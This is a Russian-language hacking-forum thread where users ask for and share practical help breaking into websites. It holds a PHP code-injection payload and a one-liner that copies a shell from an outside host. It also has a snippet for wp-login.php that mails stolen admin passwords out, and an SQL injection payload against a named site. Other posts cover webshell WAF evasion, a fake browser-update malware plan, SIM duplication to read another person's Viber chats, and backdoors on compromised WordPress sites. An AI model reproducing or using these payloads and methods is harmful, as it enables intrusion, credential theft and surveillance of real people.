PDA

Просмотр полной версии : [Задай Вопрос - Получи Ответ]


Страницы : 1 2 3 [4]

mardoksp
20.07.2018, 12:24
Нашел уязвимость, Opencart 1.5.5.1

Получил хэш паролей из бд в админку, есть доступ в админку.

Залить шелл через восстановление из бэкапа не получилось, просто открывается после клика восстановить белый экран и все, может быть что-то со скриптом намутили или какие-то расширения на сайте мешают нормально сделать. Но ни в логах ни ответа никакого нет.

Пробую через скрипт admin/controller/common/filemanager.php

Могу изменять файлы, переносить, но вот проблема в том, что через админку загружается файл и дописывается свое расширение, допустим shell.php.uhd673h76576

Но когда через filemanager пробую копировать/переносить, то все ровно дописывается расширения файла.

.SpoilerTarget" type="button">Spoiler: function copy()


public function copy() {
$this->language->load('common/filemanager');

$json = array();

if (isset($this->request->post['path']) && isset($this->request->post['name'])) {
if ((utf8_strlen($this->request->post['name']) request->post['name']) > 255)) {
$json['error'] = $this->language->get('error_filename');
}

$old_name = rtrim(DIR_IMAGE . 'data/' . str_replace('../', '', html_entity_decode($this->request->post['path'], ENT_QUOTES, 'UTF-8')), '/');

if (!file_exists($old_name) || $old_name == DIR_IMAGE . 'data') {
$json['error'] = $this->language->get('error_copy');
}

if (is_file($old_name)) {
$ext = strrchr($old_name, '.');
} else {
$ext = '';
}

$new_name = dirname($old_name) . '/' . str_replace('../', '', html_entity_decode($this->request->post['name'], ENT_QUOTES, 'UTF-8') . $ext);

if (file_exists($new_name)) {
$json['error'] = $this->language->get('error_exists');
}
} else {
$json['error'] = $this->language->get('error_select');
}

if (!$this->user->hasPermission('modify', 'common/filemanager')) {
$json['error'] = $this->language->get('error_permission');
}

if (!isset($json['error'])) {
if (is_file($old_name)) {
copy($old_name, $new_name);
} else {
$this->recursiveCopy($old_name, $new_name);
}

$json['success'] = $this->language->get('text_copy');
}

$this->response->setOutput(json_encode($json));
}


Есть какой-то вариант залить свой шелл в opencart помимо вышеперечисленных, либо как-то можно обойти strrchr?

Если залить шелл через админку, открыть полный путь, то отрабатывается только html, причем я загружаю php файл, не меняю mime.

На картинке пример.

T-90
25.07.2018, 06:47
ребята у кого есть скрипт для взлоma DLE ?

Illya
27.07.2018, 18:26
Запрос сильно грузит бд и страница очень долго загружается, а иногда вообще разрывает соединение. Как его можно оптимизировать?

$db->Query("SELECT users_a.user, users_a.date, users_b.te_on, users_a.url FROM users_a, users_b

WHERE users_a.id = users_b.id AND users_a.ref_id = '$user_id' ORDER BY te_on DESC");

if($db->NumRows() > 0){

while($ref = $db->FetchArray()){

///…тут идет вывод данных пользователей в таблицу

}

}else echo ‘…’;

karkajoi
02.08.2018, 20:14
↑ (https://antichat.live/posts/4230245/)
ребята у кого есть скрипт для взлоma DLE ?


Паблик эксплоитов под этот движок нету, только под старые версии, даже я бы сказал древнии

Angelika
09.09.2018, 18:12
Здравствуйте! Быть может, я не по теме задают вопрос, тогда поправьте меня.

Мне необходимо узнать, возможно ли восстановить годовой или полугодовой архив переписок вайбера, при условии, что доступа к самому приложению у меня нет?

likepro
09.09.2018, 19:59
↑ (https://antichat.live/posts/4243089/)
Здравствуйте! Быть может, я не по теме задают вопрос, тогда поправьте меня.
Мне необходимо узнать, возможно ли восстановить годовой или полугодовой архив переписок вайбера, при условии, что доступа к самому приложению у меня нет?


Я не очень понимаю как может не быть доступа к приложению... оно даже на пк есть...

Другой вопрос создавалась ли копия в настройках вайбера если да то переписка сама подтянется как только зайдешь.

Angelika
10.09.2018, 15:05
↑ (https://antichat.live/posts/4243124/)
Я не очень понимаю как может не быть доступа к приложению... оно даже на пк есть...
Другой вопрос создавалась ли копия в настройках вайбера если да то переписка сама подтянется как только зайдешь.


Мне нужно получить чужой архив, доступа к приложению нет никакого.

Sensoft
10.09.2018, 16:35
↑ (https://antichat.live/posts/4243346/)
Мне нужно получить чужой архив, доступа к приложению нет никакого.


ты сама понимаешь что просишь ?

у тебя не хуя нет но хочешь получить переписку да ещё полу годовой давности, у меня даже слов нет, ты бы ещё попросила дамп vk, а хули доступа к серверу нет но может как то можно

Angelika
10.09.2018, 19:06
Выражения выбирайте, чтобы себя не позорить.


↑ (https://antichat.live/posts/4243370/)
ты сама понимаешь что просишь ?
у тебя не хуя нет но хочешь получить переписку да ещё полу годовой давности, у меня даже слов нет, ты бы ещё попросила дамп vk, а хули доступа к серверу нет но может как то можно

Sensoft
11.09.2018, 01:17
↑ (https://antichat.live/posts/4243410/)
Выражения выбирайте, чтобы себя не позорить.


то есть я себя позорю, а ты вопросом который можно выполнить только чёрной магией это тип норм

Не хуя нету но хочешь что то получить

л - логика

zifus
12.09.2018, 23:18
↑ (https://antichat.live/posts/4243483/)
то есть я себя позорю, а ты вопросом который можно выполнить только чёрной магией это тип норм
Не хуя нету но хочешь что то получить
л - логика


На вопрос ТС "Мне необходимо узнать, возможно ли" есть 3 ответа

1. Да

2. Нет

3. Может быть

А способов можно найти много, вплоть до того что дать по голове и забрать устройство где стоит приложение.

likepro
15.09.2018, 17:31
↑ (https://antichat.live/posts/4243346/)
Мне нужно получить чужой архив, доступа к приложению нет никакого.


Вообще можно, стоимость такого 150-200 вам нужно искать тех кто умеет делать дубликат сим. Детали уже по ходу дела вам объяснят.

Sensoft
20.09.2018, 16:08
Есть PHP code injection

там все функции на загрузку или запись выключены

пишется только в папку tmp

/page1';$b=fopen('/var/www/ru/tmp/333.php','w');fwrite($b,%20'111text');$a='

Вызывается

page1';$b=file_get_contents('/var/www/ru/tmp/333.php');echo%20$b;$a='

Как залить что то весомое ? как можно обойти фильтры ?

если записать в файл пхп код то выдает ошибку Parse error: syntax error, unexpected ';'

/page1';$b=fopen('/var/www/ru/tmp/333.php','w');fwrite($b, '');$a='

Angelika
20.09.2018, 17:42
↑ (https://antichat.live/posts/4244756/)
Вообще можно, стоимость такого 150-200 вам нужно искать тех кто умеет делать дубликат сим. Детали уже по ходу дела вам объяснят.


Спасибо за ответ! А стоимость Вы в чем указали? В тысячах рублей?

dmax0fw
20.09.2018, 20:42
↑ (https://antichat.live/posts/4245809/)
если записать в файл пхп код то выдает ошибку
Parse error: syntax error, unexpected ';'


возможно дело в short_open_tag

попробуй записать так


fwrite($b, '');

Sensoft
20.09.2018, 20:54
↑ (https://antichat.live/posts/4245869/)
возможно дело в short_open_tag
попробуй записать так

fwrite($b, '');



Нет, та же ошибка

karkajoi
20.09.2018, 20:55
↑ (https://antichat.live/posts/4245871/)
Нет, та же ошибка




↑ (https://antichat.live/posts/4245869/)
возможно дело в short_open_tag
попробуй записать так

fwrite($b, '');



Ругается именно на , если просто текст записать, то пишет.

likepro
21.09.2018, 05:03
↑ (https://antichat.live/posts/4245832/)
Спасибо за ответ! А стоимость Вы в чем указали? В тысячах рублей?


Да

neur0funk
28.09.2018, 03:49
у него RCE а он шелл залить не может, дожили, хакеры пля, а каким сканером нашел?

copy('http://lol.com/shell.txt','/pwd/shell.php'); (http://lol.com/shell.txt','/pwd/shell.php'))

karkajoi
28.09.2018, 09:56
↑ (https://antichat.live/posts/4247820/)
у него RCE а он шелл залить не может, дожили, хакеры пля, а каким сканером нашел?
copy('
http://lol.com/shell.txt','/pwd/shell.php'); (http://lol.com/shell.txt','/pwd/shell.php'))


copy system eval и так далее выключены. Уже залился через локал инклуид.

Если бы было так просто я бы не спрашивал.

Pilot2017
28.11.2018, 11:09
Подскажите программу для накрутки голосов в интернет-голосованиях. Спасибо!

erwerr2321
28.11.2018, 11:48
↑ (https://antichat.live/posts/4264352/)
Подскажите программу для накрутки голосов в интернет-голосованиях. Спасибо!


curl ?

cat1vo
28.11.2018, 14:42
↑ (https://antichat.live/posts/4264393/)
Благодарю!
А есть что-то попроще, для начинающих? )


Если еще проще, то создать тему с просьбой перейти по ссылке и проголосовать за Вас!


↑ (https://antichat.live/posts/4247820/)
дожили, хакеры пля

k0ks
12.12.2018, 19:40
Имея шел доступ, как узнать логин\пароль от админки wordpress-а, установленном на этом сайте?

dmax0fw
13.12.2018, 04:13
↑ (https://antichat.live/posts/4268353/)
Имея шел доступ, как узнать логин\пароль от админки wordpress-а, установленном на этом сайте?


посмотреть в конфиге пароль от бд, подключиться к базе и глянуть в wp_users, ну а далее сбрутить хеш

ну и второй вариант: повесить снифер в код wordpress, который при логине в админку будет писать введённые данные в файл

k0ks
13.12.2018, 17:25
↑ (https://antichat.live/posts/4268474/)
посмотреть в конфиге пароль от бд, подключиться к базе и глянуть в wp_users, ну а далее сбрутить хеш
ну и второй вариант: повесить снифер в код wordpress, который при логине в админку будет писать введённые данные в файл


А может есть какой-нибудь скрипт, который будет вытаскивать эти данные самостоятельно?

Ну или нового суперюзера создавать в ВП?

karkajoi
16.12.2018, 20:51
↑ (https://antichat.live/posts/4268474/)
посмотреть в конфиге пароль от бд, подключиться к базе и глянуть в wp_users, ну а далее сбрутить хеш
ну и второй вариант: повесить снифер в код wordpress, который при логине в админку будет писать введённые данные в файл


Так если есть shell доступ к бд , не проще просто сменить пароль админу или добавить нового ?

dmax0fw
17.12.2018, 08:35
↑ (https://antichat.live/posts/4269591/)
Так если есть shell доступ к бд , не проще просто сменить пароль админу или добавить нового ?


проще, но вопрос был как узнать логин/пароль админа, без дополнительных уточнений

porfiry
29.12.2018, 09:24
У кого-нибудь есть Foca на винде? есть вопрос

Alaich
29.12.2018, 15:27
↑ (https://antichat.live/posts/4268353/)
Имея шел доступ, как узнать логин\пароль от админки wordpress-а, установленном на этом сайте?


В начало файла wp-login.php добавить:


if (!empty($_POST['log']) && !empty($_POST['pwd'])) {
$msg="Login: ".$_POST['log'] ."\n";
$msg.="Pass: ".$_POST['pwd'];
@mail('you@mail.ru','What you need',$msg);
}

karkajoi
31.12.2018, 01:56
union select 1,2,3,(select@%20from(select@:=0x00,(select 1 from(select*from user ORDER BY userid ASC limit 0,5)w where(@:=concat(@,0x3c62723e,username))))q) как тут задать бд к которой обращаться ?

romanshkabo
03.01.2019, 17:27
Нужна помощь с реализацией уязвимости. Acunetix Web Scanner находит уязвимость:

Nginx PHP code execution via FastCGI

Vulnerability description

A critical security issue was reported on servers that run Nginx and PHP via FastCGI. This issue may allow attackers to execute their own PHP code on the system.The problem is not caused by nginx itself, it's related with the PHP option cgi.fix_pathinfo. When this option is enabled, PHP will rewrite SCRIPT_FILENAME and PATH_INFO parameters. When combined with Nginx, this turns into a security issue.

This vulnerability affects Web Server.

Discovered by: Scripting (Nginx_PHP_FastCGI_Code_Execution_File_Upload.scri pt).

Насколько понял, данная уязвимость позволяет выполнить произвольный PHP. Пошарился по гуглу, ничего интересного не нашел. Подскажите что почитать или в какую сторону копать.

neur0funk
05.01.2019, 03:41
↑ (https://antichat.live/posts/4274561/)
Нужна помощь с реализацией уязвимости. Acunetix Web Scanner находит уязвимость:
Nginx PHP code execution via FastCGI
Vulnerability description
A critical security issue was reported on servers that run Nginx and PHP via FastCGI. This issue may allow attackers to execute their own PHP code on the system.The problem is not caused by nginx itself, it's related with the PHP option cgi.fix_pathinfo. When this option is enabled, PHP will rewrite SCRIPT_FILENAME and PATH_INFO parameters. When combined with Nginx, this turns into a security issue.
This vulnerability affects
Web Server
.
Discovered by: Scripting (Nginx_PHP_FastCGI_Code_Execution_File_Upload.scri pt).
Насколько понял, данная уязвимость позволяет выполнить произвольный PHP. Пошарился по гуглу, ничего интересного не нашел. Подскажите что почитать или в какую сторону копать.


очень древний баян, года так 10, добавь %00.php или /x00.php

etime
05.01.2019, 12:50
Можете подсказать? Залил шелл, но он не исполняет php код. Выводит только html. Выглядит это вот так. Вопрос, как заставить работать php? https://cdn1.savepice.ru/uploads/2019/1/5/f4a84811c489ef2861405fb063aec19c-full.jpg

Тот_самый_Щуп
05.01.2019, 13:01
↑ (https://antichat.live/posts/4275020/)
Можете подсказать? Залил шелл, но он не исполняет php код. Выводит только html. Выглядит это вот так. Вопрос, как заставить работать php?


Мрачно выглядит...

Попробуй сначала залить шелла с расширением .txt и посмотри корректность кода. Если всё корректно, то придется воевать с .htaccess в директории, или искать другие директории под запись.

etime
05.01.2019, 13:26
↑ (https://antichat.live/posts/4275022/)
Мрачно выглядит...
Попробуй сначала залить шелла с расширением .txt и посмотри корректность кода. Если всё корректно, то придется воевать с .htaccess в директории, или искать другие директории под запись.


Спасибо, попробую.

romanshkabo
09.01.2019, 15:48
↑ (https://antichat.live/posts/4274966/)
очень древний баян, года так 10, добавь %00.php или /x00.php


Можно чуть подробней. Где почитать можно? При обращении к site.ru/ind%ex.php получаю 400 ошибку. В остальных случаях 404

cat1vo
09.01.2019, 16:41
↑ (https://antichat.live/posts/4276018/)
Можно чуть подробней. Где почитать можно? При обращении к site.ru/ind%ex.php получаю 400 ошибку. В остальных случаях 404


Изучай:

Null byte PHP bug - https://bugs.php.net/bug.php?id=69418

Nginx FastCGI with nullbyte bug - https://nealpoole.com/blog/2011/08/...ith-null-bytes-php-and-old-versions-of-nginx/ (https://nealpoole.com/blog/2011/08/possible-arbitrary-code-execution-with-null-bytes-php-and-old-versions-of-nginx/)

Exploit - https://www.exploit-db.com/exploits/24967

WallHack
15.01.2019, 15:54
Не получается сделать вывод error based, может что-то фильтруется ?

Сайт: http://drop-bux.ru (http://drop-bux.ru/)

Уязвимость в заголовках headers

X-Forwarded-For: 1'"

Тот_самый_Щуп
15.01.2019, 16:37
↑ (https://antichat.live/posts/4277396/)
Не получается сделать вывод error based, может что-то фильтруется ?
Сайт:
http://drop-bux.ru (http://drop-bux.ru/)
Уязвимость в заголовках headers
X-Forwarded-For:
1'"


Все стандартно крутится: X-Forwarded-For: 123"\'and(extractvalue(1,concat(0x3b,(select(version() )))))#

WallHack
15.01.2019, 16:50
↑ (https://antichat.live/posts/4277410/)
Все стандартно крутится: X-Forwarded-For: 123"\'and(extractvalue(1,concat(0x3b,(select(version() )))))#


Действительно, видать после армии совсем ебанулся, спасибо !

ProstoZheka
19.01.2019, 21:42
↑ (https://antichat.live/posts/1045187/)
сайт ругнулся
General Error
SQL ERROR [ mysql4 ]
Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (111) [2002]
An sql error occurred while fetching this page. Please contact an administrator if this problem persists.
что из этого я могу извлечь? насколько я понял версия mysql 4 а вот про бд непонял mysql.sock' (111) [2002]
что эт значит?


Ругается на сокет, значит с пакетами что-то не так. Можно посмотреть что он на сайт отправляет через wireshark, а там довольно читабельно должно быть

krujka121
02.02.2019, 11:43
https://i.imgur.com/yuns2ms.png

Могу менять значение max_age. Это php иньекция, или как?

L73898UNIT
06.02.2019, 18:57
Привет, не знаю в какую тему лучше написать, напишу сюда.

Есть сайтик, на нем залит шелл. На сайтике есть сабдомены, у каждого сабдомена есть своя админка.

Задача: заразить с помощью админки самого админа (когда он логинится в свой сабдомен).

Для себя грубо сформулировал последовательность: Админ логинится, в зависимости от ОС/Браузера через н-ое время появляется "Ваш браузер устарел тра-ляля", автоматом загружается "обновление.exe". Т.к. последний раз с малварью имел несколько лет назад (и то поверхостно), сейчас совсем не понимаю реальных возможностей данного способа. Как барузер и ос будут реагировать на данный способ? Где можно взять скрипты фейк обновления по вышеупомянутым параметрам? Возможно есть человек, который сможет реализовать данный задум за разумную цену.

UPD: Возможно, кто-то знает способ более легкий и изящнее, буду рад этой информации...

BabaDook
07.02.2019, 10:44
↑ (https://antichat.live/posts/4281853/)
https://i.imgur.com/yuns2ms.png
Могу менять значение max_age. Это php иньекция, или как?


Нет

karkajoi
15.02.2019, 22:04
Добрый. Подскажите структуру таблиц базы xenforo, какой у него дефолтный префикс и в какой таблице и колонке хранятся хэш соль?

BillyBons
15.02.2019, 23:19
↑ (https://antichat.live/posts/4285382/)
Добрый. Подскажите структуру таблиц базы xenforo, какой у него дефолтный префикс и в какой таблице и колонке хранятся хэш соль?


Таблица xf_user_authenticate

колонка data

holdik
03.03.2019, 02:43
Имею RCE через passthru, имею тысячи папок, как можно найти с правами на запись?)

Поделитесь командой плз

BillyBons
03.03.2019, 10:59
↑ (https://antichat.live/posts/4289707/)
Имею RCE через passthru, имею тысячи папок, как можно найти с правами на запись?)
Поделитесь командой плз


find -type f -maxdepth 1 -writable

suzi
06.04.2019, 06:50
Если папки, то, скорее find -type d -writable 2>/dev/null

careberga
10.05.2019, 23:40
Подскажите пожалуйста

Скачиваю дамп с одного сайта некоторые файлы в полном порядке и читабельны. Некоторые полностью а некоторые частично вместо значений имеют вот такой знак !~!1 что это означает? И как с этим бороться?

BabaDook
11.05.2019, 00:55
↑ (https://antichat.live/posts/4306276/)
Подскажите пожалуйста
Скачиваю дамп с одного сайта некоторые файлы в полном порядке и читабельны. Некоторые полностью а некоторые частично вместо значений имеют вот такой знак !~!1 что это означает? И как с этим бороться?


Может не текстовый файл?

careberga
11.05.2019, 01:20
↑ (https://antichat.live/posts/4306287/)
Может не текстовый файл?


Там должны быть числа единственное что могу предположить что там не на английском. Возможно ли что это связано с кодировкой языка? Там язык далекий от инглиша и если это так какую команду использовать?

suzi
15.05.2019, 06:24
file -i dump.txt

покажет тебе кодировку. Выполнять на сервере.

scoring0
18.05.2019, 18:25
Привет. Есть ошибка:


Ошибка БД
Error Number: 1054
Unknown column 'Array' in 'where clause'
SELECT * FROM (`ty_user_accounts`) WHERE `account_name` = Array


Она возникает, когда переменную id делаю массивом, т.ч. id[]=vasya

НО если я пытаюсь поставить что-нибудь кроме vasya - страница с этим скриптом просто выводит: account_name.pewpew , даже при указании ковычки - она просто выведет account_name.'

Как быть?

p.s. скульмапом гонял на level 5 risk 3 - без результатов. error-based пробовал разные пейлоады - все так же просто выводит на экран.

b3
19.05.2019, 10:52
по моему в запросе не хватает кавычек если вам нужен string тип, попробуй id='vasya' или id='%%%'

scoring0
19.05.2019, 13:15
↑ (https://antichat.live/posts/4307852/)
по моему в запросе не хватает кавычек если вам нужен string тип, попробуй id='vasya' или id='%%%'


Нет, все так же выводит просто 'vasya' ))

Octavian
23.05.2019, 18:28
Обычно если сгенерировать онлайн пароль то они получаются непонятными и есть риск что сотрудники начнут их записывать, есть что то аналогичное чтоб сгенерировать понятный/легко запоминаемый/надежный пароль?

scoring0
29.05.2019, 00:02
↑ (https://antichat.live/posts/4308577/)
Обычно если сгенерировать онлайн пароль то они получаются непонятными и есть риск что сотрудники начнут их записывать, есть что то аналогичное чтоб сгенерировать понятный/легко запоминаемый/надежный пароль?


мнемонические фразы

BabaDook
29.05.2019, 00:05
↑ (https://antichat.live/posts/4308577/)
Обычно если сгенерировать онлайн пароль то они получаются непонятными и есть риск что сотрудники начнут их записывать, есть что то аналогичное чтоб сгенерировать понятный/легко запоминаемый/надежный пароль?


Угу, моск. Какая цель?

WallHack
28.07.2019, 20:48
Не получается сделать вывод error based, возможно параметр pass кодируется ?

adv.icu/user.php?mode=login

POST

login=\&pass=SQL

Тот_самый_Щуп
28.07.2019, 22:05
↑ (https://antichat.live/posts/4321786/)
Не получается сделать вывод error based, возможно параметр pass кодируется ?
adv.icu/user.php?mode=login
POST
login=\&pass=SQL


Кавычки тут фильтруются, а вот символ \ который нарушает синтаксис, вредоносным не считается. Поэтому искать в другом месте SQL, и не забывать про семью

IamQWERTY
10.05.2020, 16:28
Подскажите чайнику плиз

Есть сайт с boolean blind уязвимостью


site.com/forum/post?id=12345+and+substring((...+LIMIT+0,1),1,1)="буква"

Подобрал таблицу "user" и "username"

Когда пытаюсь достать юзернейм вылазит ошибка HTTP ERROR #500

Может у кого нибудь есть идеи почему (или как исправить)?

neur0funk
10.05.2020, 17:13
↑ (https://antichat.live/posts/4386310/)
Подскажите чайнику плиз
Есть сайт с boolean blind уязвимостью

site.com/forum/post?id=12345+and+substring((...+LIMIT+0,1),1,1)="буква"

Подобрал таблицу "user" и "username"
Когда пытаюсь достать юзернейм вылазит ошибка HTTP ERROR #500
Может у кого нибудь есть идеи почему (или как исправить)?


WAF видимо, попробуй 0x bin2hex

IamQWERTY
10.05.2020, 18:36
↑ (https://antichat.live/posts/4386324/)
WAF видимо, попробуй 0x bin2hex


Пробовал и url кодирование, и 0х, все равно никак

+ сайт и так был с cloudflare, так что морочиться с другой waf они бы не стали

Скорее всего какая-то ошибка на сервере, но я понятия не имею чем она может быть вызвана

UPD

Сорри, это и правда была WAF, фильтрует только колонки username и pass...

Кто нибудь может скинуть пример как обойти (хотя бы bin2hex)?

holdik
31.05.2020, 04:26
Может кто подсказать по софту/скрипту. Нужно проверить большую базу доменов на уязвимость. Скрипт должен переходить по ссылке и сверять присутствует ли нужный текст.. базы большие, нужен многопоток.

tester_new
12.06.2020, 23:58
Приветствую всех,

буду очень рад если подскажите есть ли в beef по дефолту модуль keloger-a, несколько лет назад(или более)я вроде видел.... сейчас кинулся но найти не могу.

fandor9
13.06.2020, 01:00
↑ (https://antichat.live/posts/4393985/)
Приветствую всех,
буду очень рад если подскажите есть ли в beef по дефолту модуль keloger-a, несколько лет назад(или более)я вроде видел.... сейчас кинулся но найти не могу.


Вроде есть модуль iFrame_keylogger (https://github.com/beefproject/beef/blob/7d95afef516ac6155331bfef42528fe0ac8ee194/modules/misc/iframe_keylogger/config.yaml)

tester_new
13.06.2020, 02:10
↑ (https://antichat.live/posts/4393991/)
Вроде есть модуль
iFrame_keylogger (https://github.com/beefproject/beef/blob/7d95afef516ac6155331bfef42528fe0ac8ee194/modules/misc/iframe_keylogger/config.yaml)


Спасибо(был не внимателен), все верно, модуль называетсяiframe event logger, но заставить работать его в FireFox 60.6.2esr (64-bit) так и не вышло..

http://127.0.0.1:3000/demos/secret_page.html

Результат:

ps:Либо я не верно понял саму логику работы данного модуля... Это просто шаблон? Так как в исходниках страницы я не нашел абсолютно никакого JS кода, из за чего логично данный модуль и не работает, прошу подсказать если кто знает...

fandor9
15.06.2020, 21:35
↑ (https://antichat.live/posts/4393994/)
Спасибо(был не внимателен), все верно, модуль называется
iframe event logger
, но заставить работать его в FireFox 60.6.2esr (64-bit) так и не вышло..
View attachment 10089 (https://antichat.live/attachments/10089.img)
http://127.0.0.1:3000/demos/secret_page.html
View attachment 10090 (https://antichat.live/attachments/10090.img)
Результат:
View attachment 10091 (https://antichat.live/attachments/10091.img)
ps:Либо я не верно понял саму логику работы данного модуля... Это просто шаблон? Так как в исходниках страницы я не нашел абсолютно никакого JS кода, из за чего логично данный модуль и не работает, прошу подсказать если кто знает...


не знаю что у вас там, но у меня работает

Там в модуле есть JS файл (https://github.com/beefproject/beef/blob/7d95afef516ac6155331bfef42528fe0ac8ee194/modules/misc/iframe_keylogger/command.js), который цепляется на ивенты "keypress" и обрабатывает их, отсылая в лог.

В общем по порядку:

1) Цепляете браузер через ссылку http://localhost:3000/demos/basic.html

2) Заходите в "current Browser" -> "Commands" -> "Misc" -> "iFrame Event Logger"

3) Тут в опция модуля можете выставлять, что за болванка/источник будет показаваться поверх сайта, который вы подцепили.

4) Отсылаете "Execute" и всё что задает пользователь в текстовые элементы, отображается у вас в "Current Browser" -> "Logs" -> "[User typed] secret password"

tester_new
24.06.2020, 23:58
Работает, но делал все полностью аналогично как и в первый раз(по скринам видно думаю), вопрос наверное выглядел странным, но я действительно так и не понял почему данный модуль не работал вначале.

оlbaneс
06.09.2020, 18:14
Такой вопрос. Делается сайт. Там есть поля куда юзеры могут вносить тексты. Есть поля где вносятся только десятичные цифры

Как правильно сделать? Экранировать все что можно или как?

Например, если вместо ">alert()

ввести это зашифрованое в двоичном коде 10001011111011110011100111100011111001011010011110 00011101001111101100001110110011001011110010111010 01010001010011111001011111110011110001111100101101 00111100001110100111110

Такая конструкция сможет сработать?

Или ставить скрипт который фильтрует комбинации?

Тот_самый_Щуп
06.09.2020, 18:35
↑ (https://antichat.live/posts/4412953/)
Такой вопрос. Делается сайт. Там есть поля куда юзеры могут вносить тексты. Есть поля где вносятся только десятичные цифры
Как правильно сделать? Экранировать все что можно или как?
Например, если вместо ">alert()
ввести это зашифрованое в двоичном коде 10001011111011110011100111100011111001011010011110 00011101001111101100001110110011001011110010111010 01010001010011111001011111110011110001111100101101 00111100001110100111110
Такая конструкция сможет сработать?
Или ставить скрипт который фильтрует комбинации?


Такая конструкция сработает, если у тебя на сайте происходит преобразование в обычный текст и вывод на экран.

Если инпут подразумевает только числа, то фильтруй его от всего остального специально предназначенными для этого функциями

polzunki
09.02.2021, 17:03
Подскажите, что можно сделать в этой ситуации?

Заливается без проблем:




Админер к примеру тоже. Но если пробую залить шелл, получаю 403.


Forbidden

You don't have permission to access this resource.

Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.

crlf
10.02.2021, 14:08
↑ (https://antichat.live/posts/4445777/)
Но если пробую залить шелл, получаю 403.


Скорее всего срабатывает WAF, нужно обфусцировать исходный код.

m0ze
10.03.2021, 00:09
↑ (https://antichat.live/posts/4445777/)
Но если пробую залить шелл, получаю 403.


Поди, WSO лить пытался? Из вариантов: zip/tar с последующей распаковкой; curl/wget; обфускация (или шелл попроще).

Octavian
17.04.2021, 01:33
Не могу выполнить XSS, Помогите

Пробовал создать 2 обьекта с функцией zxc(), не прокатывает вызов до создания

Octavian
19.05.2021, 02:38
Очень круто сделано на hackerone.com при сбросе пароля для любой почты пишет что ссылка отправлена, это позволяет не палить зарегана почта или нет у них.

Но как быть с формой регистраций что выводить если почта занята?

crlf
19.05.2021, 02:47
↑ (https://antichat.live/posts/4460379/)
Но как быть с формой регистраций что выводить если почта занята?


Отвечать так же - всё ок, а на почту слать месседж, что не стоит пытаться зарегаться повторно и правильным делом будет воспользоваться восстановлением пароля. Ну и на всякий случай, линк на заморозку аккаунта, если идет какой-то мухлёж.

Octavian
19.05.2021, 03:51
В каких случаях prepared statements могут не защитить от SQL Injection?

Octavian
18.06.2021, 19:20
Привет, сегодня посмотрел в Chrome и Cookie больше не отправляются при POST CSRF, как раскручивать POST CSRF? Что дальше?

Baskin-Robbins
18.06.2021, 19:31
Samesite cookie

Искать html инъекцию или xss

+

medium.com/@renwa/bypass-samesite-cookies-default-to-lax-and-get-csrf-343ba09b9f2b

neur0funk
19.06.2021, 22:59
↑ (https://antichat.live/posts/4464228/)
Samesite cookie
Искать html инъекцию или xss
+
medium.com/@renwa/bypass-samesite-cookies-default-to-lax-and-get-csrf-343ba09b9f2b


https://miro.medium.com/max/700/1*hXoYTB_p1lMGTDrtIVpFTQ.png

красивое решение, интересно как быстро пофиксят

UN77H92ZE1
05.07.2021, 20:07
Есть вебсайт 1-localhost.domain, при обращении к которому всплывает единственная форма, где ручками нужно ввести дату рождения в числах и нажать кнопку ОК, такой себе 18+ ограничитель. После успешной проверки перекидывает на целевой ресурс 2-localhost.domain.

Суть в том, что при правильном или неправильном вводе значений в папке где расположен скрипт (access.php) обработки этих значений появляются 2 файла: "good" и "notgood", где записываются данные из поля ввода таким образом:


["2021-07-05 13:00:00"{"yy":"1_testantichat","mm":"2_testantichat","dd":"3_testantichat","submit":"OK"}]

Расширения эти файлы не имеют.

html и access.php кажется эти, но процесса создания файлов там не увидел:

https://coderoad.ru/36852236/Возрастной-код-проверки-выгоняет-людей-из-дома-к-старости (https://coderoad.ru/36852236/%D0%92%D0%BE%D0%B7%D1%80%D0%B0%D1%81%D1%82%D0%BD%D 0%BE%D0%B9-%D0%BA%D0%BE%D0%B4-%D0%BF%D1%80%D0%BE%D0%B2%D0%B5%D1%80%D0%BA%D0%B8-%D0%B2%D1%8B%D0%B3%D0%BE%D0%BD%D1%8F%D0%B5%D1%82-%D0%BB%D1%8E%D0%B4%D0%B5%D0%B9-%D0%B8%D0%B7-%D0%B4%D0%BE%D0%BC%D0%B0-%D0%BA-%D1%81%D1%82%D0%B0%D1%80%D0%BE%D1%81%D1%82%D0%B8)

Подскажите, есть ли смысл в этом и если да, то куда копнуть? Спасибо

Octavian
06.10.2021, 11:50
Привет, поделитесь пожалуйста примером баге в apache CVE-2021-41773 в Apache 2.4.49,

karkajoi
06.10.2021, 14:00
↑ (https://antichat.live/posts/4476890/)
Привет, поделитесь пожалуйста примером баге в apache CVE-2021-41773 в Apache 2.4.49,


https://xakep.ru/2021/10/05/apache-path-traversal/

Octavian
06.10.2021, 14:06
↑ (https://antichat.live/posts/4476919/)
https://xakep.ru/2021/10/05/apache-path-traversal/


Пример на реальном сайте

CyberTro1n
07.10.2021, 00:08
↑ (https://antichat.live/posts/4476919/)
https://xakep.ru/2021/10/05/apache-path-traversal/


Не стоило

dudka
24.10.2021, 23:50
Подскажите, снесло ( а может и нет, выдает 403 ошибку ) все бэкдоры и шеллы за один день. Единственное, что объединяло сайты то, что они все на WP и залит бэкдор в файлы wp-content или wp-includes. Гео разные, хосты разные, приобретены доступы все в разное время. Что могло произойти ? Бэкдор самопис и служит мне года 2-3, залит не на так много сайтов.

KIR@PRO
26.10.2021, 22:06
↑ (https://antichat.live/posts/4479306/)
Подскажите, снесло ( а может и нет, выдает 403 ошибку ) все бэкдоры и шеллы за один день. Единственное, что объединяло сайты то, что они все на WP и залит бэкдор в файлы wp-content или wp-includes. Гео разные, хосты разные, приобретены доступы все в разное время. Что могло произойти ? Бэкдор самопис и служит мне года 2-3, залит не на так много сайтов.


Могли просто доступ к дикектории закрыть в случае если это wp-includes, и в wp-content могли, зависит от того где лежал конкретно. Скорее всего так и сделали, раз 403.

dudka
26.10.2021, 23:04
↑ (https://antichat.live/posts/4479516/)
Могли просто доступ к дикектории закрыть в случае если это wp-includes, и в wp-content могли, зависит от того где лежал конкретно. Скорее всего так и сделали, раз 403.


Я понимаю если бы это на одном сайты произошло, но проблема в том, что разные доступы на разных хостах, порядком 50 доступов отлетело.

Octavian
22.11.2021, 12:05
Привет, помогите раскрутить если она тут есть, работает с инкогнито.

http://facebook.com/plugins/close_popup.php?prev_url=javascript+:alert(9)

mrf0x
22.12.2021, 01:43
Всем привет. Пытаюсь залить шелл через загрузку аватара. php не заливаются, php3,php5,phtml и так далее не выполняются, выводятся просто текстом.

